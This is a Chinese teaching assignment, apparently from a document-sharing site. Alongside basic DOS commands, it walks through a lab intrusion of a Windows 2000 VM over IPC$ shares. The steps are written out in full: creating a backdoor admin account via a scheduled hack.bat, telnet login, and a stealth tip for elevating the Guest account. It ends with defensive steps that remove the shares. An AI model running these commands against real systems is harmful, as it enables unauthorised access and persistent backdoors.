第二次作业DOS命令与IPC入侵防范.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
第二次作业DOS命令与IPC入侵防范

第二次作业 常用DOS命令(把下列命令运行的结果截图) Ping Ipconfig Dir Md Echo Type Net user net localgroup At Net stat arp DOS命令综合运用之利用IPC漏洞入侵提权(开启windows 2000与XP虚拟机) 利用XP作为客户机,windows 2000作为服务器,在XP中操作入侵wind2000,步骤: 开启wind2000 telnet服务可以用OpenTelnet.exe工具,将OpenTelnet.exe拷贝到C盘根目录下并执行OpenTelnet.exe \\192.168.2.2 administrator 123456 1 90 如下图 给wind2000超级管理员administraror设置密码为123456,如下图 利用net use * /del清空所有的IPC连接,如下图 利用net use \\192.168.2.2\ipc$ 123456 /user:administrator建立一个超级IPC连接,如下图 利用net use z:\\192.168.2.2\c$ 把windows2000 C盘变成本地磁盘(XP中)的Z盘,打开XP里我的电脑 如下图 利用(echo net user hack 123456 /add hack.bat和(echo net localgroup administrators hack /add hack.bat二条指令建立一个名为hack.bat的后门账号,并利用type查看命令是否正确, 如下图 利用copy hack.bat \\192.168.2.2\c$,把hack.bat拷贝到windows2000的C盘, 如下图 利用net time \\192.168.2.2查看windows2000系统当前时间,如下图 假设当前时间为8:45分,则可以利用 at\ \192.168.2.2 8:46 c:\hack.bat ,来执行hack.bat建立后门账号,如下图: 利用net use */del删除IPC连接,如下图 等一小段时间后估计windos2000以执行hack.bat,则通过telnet 192.168.2.2去登陆,并利用账号hack ,密码123456验证,若能登陆说明入侵成功。如下图 小策略:为了隐蔽可以利用guest账号,net user guest /active:yes将Guest用户激活, net user guest 1234 将Guest的密码改为1234, net localgroup administrators guest /add 将Guest变为Administrator超级管理员,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了。 IPC漏了防范: (1) 运行命令提示符(cmd.exe),在命令提示符下输入如下命令: net share 查看默认共享,如下图 (2) 在命令提示符下输入如下命令: net share ipc$ /delete 删除ipc$共享。如下图 逐步使用net share命令,删除c$、d$、e$、f$和admin$共享。如下图 (4) 接着在命令提示符下输入如下命令: net stop server /y 停止Server服务,该服务提供 RPC 支持、文件、打印以及命名管道共享,如下图 (5) 运行注册表编辑器,找到如下键值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters 修改注册表键值【AutoShareWks】的Dword值 修改注册表键值【AutoShareServer】的Dword值如下图

文档评论(0)

xcs88858 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:8130065136000003

1亿VIP精品文档

相关文档